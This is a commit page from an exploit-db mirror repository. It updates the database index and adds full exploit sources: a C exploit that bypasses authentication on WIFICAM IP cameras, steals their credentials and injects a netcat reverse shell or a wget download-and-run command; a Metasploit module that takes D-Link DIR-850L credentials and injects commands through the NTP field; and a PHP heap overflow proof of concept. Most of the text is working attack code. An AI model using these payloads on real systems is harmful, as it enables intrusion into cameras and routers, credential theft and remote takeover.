bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-11-15

Browse source 
9 new exploits

GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service
GNU TAR 1.15.91 / CPIO 2.5.90 - 'safer_name_suffix' Remote Denial of Service
Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free
PHP 7.1.8 - Heap-Based Buffer Overflow

PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free
Realtek Audio Control Panel 1.0.1.65 - Exploit
Realtek Audio Microphone Calibration 1.1.1.6 - Exploit
Realtek HD Audio Control Panel 2.1.3.2 - Exploit
Realtek Audio Control Panel 1.0.1.65 - Buffer Overflow
Realtek Audio Microphone Calibration 1.1.1.6 - Buffer Overflow
Realtek HD Audio Control Panel 2.1.3.2 - Buffer Overflow

Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)
Odin Secure FTP 4.1 - 'LIST' Stack Buffer Overflow (Metasploit)
STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)
STUNSHELL Web Shell - Remote Code Execution (Metasploit)
STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)
STUNSHELL (Web Shell) - Remote Code Execution (Metasploit)
Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)
Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution
Ulterius Server < 1.9.5.0 - Directory Traversal
D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)
Dup Scout Enterprise 10.0.18 - 'Login' Buffer Overflow
Gogs (label pararm) - SQL Injection
Gogs - users and repos q SQL Injection
Gogs - 'label' SQL Injection
Gogs - 'users'/'repos' '?q' SQL Injection

Kirby CMS < 2.5.7 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-11-15 05:01:30 +00:00
parent 9e4de03a13
commit cb946ad7aa
16 changed files with 1282 additions and 19 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
files.csv
View file

@ -3887,7 +3887,7 @@ id,file,description,date,author,platform,type,port
30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0
30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - 'safer_name_suffix' Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
@ -5729,7 +5729,10 @@ id,file,description,date,author,platform,type,port
43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0
43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0
43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0
43131,platforms/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",windows,dos,0
43133,platforms/multiple/dos/43133.php,"PHP 7.1.8 - Heap-Based Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",multiple,dos,0
43135,platforms/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,windows,dos,0
43144,platforms/windows/dos/43144.txt,"PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free",2017-11-14,"X41 D-Sec GmbH",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -7002,9 +7005,9 @@ id,file,description,date,author,platform,type,port
15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0
15489,platforms/windows/local/15489.py,"MP3-Nator 2.0 - Buffer Overflow (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0
15532,platforms/windows/local/15532.py,"Foxit Reader 4.1.1 - Stack Buffer Overflow",2010-11-14,sud0,windows,local,0
15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Exploit",2010-11-14,BraniX,windows,local,0
15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Exploit",2010-11-14,BraniX,windows,local,0
15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Exploit",2010-11-14,BraniX,windows,local,0
15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Buffer Overflow",2010-11-14,BraniX,windows,local,0
15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Buffer Overflow",2010-11-14,BraniX,windows,local,0
15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Buffer Overflow",2010-11-14,BraniX,windows,local,0
15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter)",2010-11-15,dookie,windows,local,0
15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0
15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH) (DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0
@ -11383,7 +11386,7 @@ id,file,description,date,author,platform,type,port
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16719,platforms/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21
@ -13700,8 +13703,8 @@ id,file,description,date,author,platform,type,port
24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow (SEH)",2013-03-29,"Myo Soe",windows,remote,0
24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0
24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,linux,remote,5666
24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
24902,platforms/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
24903,platforms/php/remote/24903.rb,"STUNSHELL (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0
24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0
24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0
@ -15947,6 +15950,11 @@ id,file,description,date,author,platform,type,port
43112,platforms/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote,0
43118,platforms/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",hardware,remote,0
43121,platforms/windows/remote/43121.txt,"Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,windows,remote,0
43132,platforms/windows/remote/43132.rb,"Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)",2017-11-09,Metasploit,windows,remote,0
43142,platforms/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution",2017-03-08,PierreKimSec,hardware,remote,80
43141,platforms/windows/remote/43141.py,"Ulterius Server < 1.9.5.0 - Directory Traversal",2017-11-13,"Rick Osgood",windows,remote,0
43143,platforms/linux_mips/remote/43143.rb,"D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)",2017-11-14,Metasploit,linux_mips,remote,0
43145,platforms/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Buffer Overflow",2017-11-14,sickness,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -34777,8 +34785,8 @@ id,file,description,date,author,platform,type,port
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,"Patrick de Brouwer",php,webapps,0
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' SQL Injection",2011-01-16,ShivX,php,webapps,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
35237,platforms/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
35238,platforms/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
35246,platforms/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
@ -38824,3 +38832,4 @@ id,file,description,date,author,platform,type,port
43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0
43140,platforms/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps,0

Can't render this file because it is too large.

253
platforms/hardware/remote/43142.c Executable file
View file

@ -0,0 +1,253 @@
# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
char * creds(char *argv,
int get_config);
int rce(char *argv,
char *id,
char attack[],
char desc[]);
int main(int argc,
char **argv,
char **envp)
{
char *id;
printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
if (argc < 2)
{
printf("%s target\n", argv[0]);
printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
return (1);
}
if (argc == 2)
printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
if (argc == 3 && !strcmp(argv[2], "--get-config"))
id = creds(argv[1], 1);
else
id = creds(argv[1], 0);
if (id == NULL)
{
printf("exploit failed\n");
return (1);
}
printf("done\n");
printf(" login = %s\n", id);
printf(" pass = %s\n", id + 32);
if (!rce(argv[1], id, PAYLOAD_0, "planting"))
printf("done\n");
sleep(1);
if (!rce(argv[1], id, PAYLOAD_1, "executing"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
printf("done\n");
printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
return (0);
}
char * creds(char *argv,
int get_config)
{
int sock;
int n;
struct sockaddr_in serv_addr;
char buf[8192] = { 0 };
char *out;
char *tmp;
char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
int old_n;
int n_total;
sock = 0;
n = 0;
old_n = 0;
n_total = 0;
printf("[+] bypassing auth ... ");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (NULL);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (NULL);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("creds: connect failed\n");
return (NULL);
}
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("creds: send failed\n");
return (NULL);
}
if (!(tmp = malloc(10 * 1024 * sizeof(char))))
return (NULL);
if (!(out = calloc(64, sizeof(char))))
return (NULL);
while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
{
n_total += n;
if (n_total < 1024 * 10)
memcpy(tmp + old_n, buf, n);
if (n >= 0)
old_n = n;
}
close(sock);
/*
[ HTTP HEADERS ]
...
000????: 0000 0a0a 0a0a 01.. .... .... .... ....
^^^^ ^^^^ ^^
Useful reference in the binary data
in order to to find the positions of
credentials
...
...
0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
...
NOTE: reference can be too:
000????: 0006 0606 0606 0100 000a .... .... ....
Other method: parse everything, find the "admin" string and extract the associated password
by adding 31bytes after the address of 'a'[dmin].
Works if the login is admin (seems to be this by default, but can be changed by the user)
*/
if (get_config)
{
for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
printf("%c", tmp[j]);
exit (0);
}
for (unsigned int j = 50; j < 10 * 1024; j++)
{
if (tmp[j - 4] == 0x0a &&
tmp[j - 3] == 0x0a &&
tmp[j - 2] == 0x0a &&
tmp[j - 1] == 0x0a &&
tmp[j] == 0x01)
{
if (j + 170 < 10 * 1024)
{
strcat(out, &tmp[j + 138]);
strcat(out + 32 * sizeof(char), &tmp[j + 170]);
free(tmp);
return (out);
}
}
}
free(tmp);
return (NULL);
}
int rce(char *argv,
char *id,
char attack[],
char desc[])
{
int sock;
struct sockaddr_in serv_addr;
char *payload;
if (!(payload = calloc(512, sizeof(char))))
return (1);
sock = 0;
printf("[+] %s payload ... ", desc);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (1);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (1);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("rce: connect failed\n");
return (1);
}
sprintf(payload, attack, id, id + 32);
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("rce: send failed\n");
return (1);
}
return (0);
}

230
platforms/linux_mips/remote/43143.rb Executable file
View file

@ -0,0 +1,230 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
'Description' => %q{
This module leverages an unauthenticated credential disclosure
vulnerability to then execute arbitrary commands on DIR-850L routers
as an authenticated user. Unable to use Meterpreter payloads.
},
'Author' => [
'Mumbai', # https://github.com/realoriginal (module)
'Zdenda' # vuln discovery
],
'References' => [
['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
],
'DisclosureDate' => 'Aug 9 2017',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['Server']
auth = res.headers['Server']
if auth =~ /DIR-850L/
if auth =~ /WEBACCESS\/1\.0/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
# some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
# should write an auxiliary module to-do -> WRITE AUXILIARY
def retrieve_creds
begin
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n"
xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n"
xml << "</postxml>"
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'encode_params' => false,
'headers' => {
'Accept-Encoding' => 'gzip, deflate',
'Accept' => '*/*'
},
'ctype' => 'text/xml',
'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
'data' => xml,
})
if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
print_good("#{peer} - Downloaded credentials to #{loot}")
return username, password
else
fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def retrieve_uid
begin
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'GET',
})
parse = res.get_json_document
uid = parse['uid']
challenge = parse['challenge']
return uid, challenge
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def login(username, password)
uid, challenge = retrieve_uid
begin
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def execute_command(cmd, opts)
uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n"
payload << "<module>\r\n"
payload << " <service>DEVICE.TIME</service>\r\n"
payload << " <device>\r\n"
payload << " <time>\r\n"
payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
payload << " </ntp>\r\n"
payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " </ntp6>\r\n"
payload << " <timezone>20</timezone>\r\n"
payload << " <time/>\r\n"
payload << " <date/>\r\n"
payload << " <dst>0</dst>\r\n"
payload << " <dstmanual/>\r\n"
payload << " <dstoffset/>\r\n"
payload << " </time>\r\n"
payload << " </device>\r\n"
payload << "</module>\r\n"
payload << "</postxml>"
begin
# save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
})
# execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
'data' => 'ACTIONS=SETCFG,ACTIVATE',
'cookie' => "uid=#{uid}"
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
end
#
# Information Retrieval, obtains creds and logs in
#
@username, @password = retrieve_creds
execute_cmdstager(
:flavor => :wget,
:linemax => 200
)
end
end

142
platforms/multiple/dos/43133.php Executable file
View file

@ -0,0 +1,142 @@
Description:
------------
A heap out-of-bound read vulnerability in timelib_meridian() can be triggered via wddx_deserialize() or other vectors that call into this function on untrusted inputs.
$ ~/php-7.1.8/sapi/cli/php --version
PHP 7.1.8 (cli) (built: Aug 9 2017 21:42:13) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies
Configuration:
CC="`which gcc`" CFLAGS="-O0 -g -fsanitize=address" ./configure --disable-shared --enable-wddx
Credit:
Wei Lei and Liu Yang of Nanyang Technological University
Test script:
---------------
$ cat wddx.php
*/
<?php
$argc = $_SERVER['argc'];
$argv = $_SERVER['argv'];
$dir_str = dirname(__FILE__);
$file_str = ($dir_str)."/".$argv[1];
if (!extension_loaded('wddx')) print "wddx not loaded.\n";
$wddx_str = file_get_contents($file_str);
print strlen($wddx_str) . " bytes read.\n";
var_dump(wddx_deserialize($wddx_str));
?>
/*
$ cat repro2.wddx
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version='1.0'>
<header/>
<data>
<struct>
<var name='aDateTime'>
<dateTime>frONt of 0 0</dateTime>
</var>
</struct>
</data>
</wddxPacket>
/*
Expected result:
----------------
NO CRASH
Actual result:
--------------
$ ~/php-7.1.8/sapi/cli/php wddx.php repro2.wddx
309 bytes read.
=================================================================
==13788== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb57057fc at pc 0x809b622 bp 0xbf9d09d8 sp 0xbf9d09cc
READ of size 1 at 0xb57057fc thread T0
#0 0x809b621 in timelib_meridian /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:410
#1 0x80e0293 in scan /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:18228
#2 0x80f0710 in timelib_strtotime /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:23194
#3 0x806afed in php_parse_date /home/weilei/php-7.1.8/ext/date/php_date.c:1455
#4 0x8a2c588 in php_wddx_process_data /home/weilei/php-7.1.8/ext/wddx/wddx.c:1071
#5 0x8a40f7b in _cdata_handler /home/weilei/php-7.1.8/ext/xml/compat.c:265
#6 0xb5cc06b5 in xmlParseCharData__internal_alias /home/weilei/libxml2/parser.c:4597
#7 0xb5d129be in xmlParseTryOrFinish /home/weilei/libxml2/parser.c:11715
#8 0xb5d1a462 in xmlParseChunk__internal_alias /home/weilei/libxml2/parser.c:12454
#9 0x8a42de6 in php_XML_Parse /home/weilei/php-7.1.8/ext/xml/compat.c:600
#10 0x8a2c974 in php_wddx_deserialize_ex /home/weilei/php-7.1.8/ext/wddx/wddx.c:1105
#11 0x8a2f394 in zif_wddx_deserialize /home/weilei/php-7.1.8/ext/wddx/wddx.c:1323
#12 0x8ddcd0b in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:675
#13 0x8dd70df in execute_ex /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:429
#14 0x8dd8845 in zend_execute /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:474
#15 0x8c32247 in zend_execute_scripts /home/weilei/php-7.1.8/Zend/zend.c:1476
#16 0x8a5fbc5 in php_execute_script /home/weilei/php-7.1.8/main/main.c:2537
#17 0x90f5a70 in do_cli /home/weilei/php-7.1.8/sapi/cli/php_cli.c:993
#18 0x90f834b in main /home/weilei/php-7.1.8/sapi/cli/php_cli.c:1381
#19 0xb5ab9a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
#20 0x8065230 in _start (/home/weilei/php-7.1.8/sapi/cli/php+0x8065230)
0xb57057fc is located 0 bytes to the right of 12-byte region [0xb57057f0,0xb57057fc)
allocated by thread T0 here:
#0 0xb6168854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)
#1 0x8b73387 in __zend_malloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2820
#2 0x8b704a6 in _emalloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2413
#3 0x8b710f1 in _safe_emalloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2472
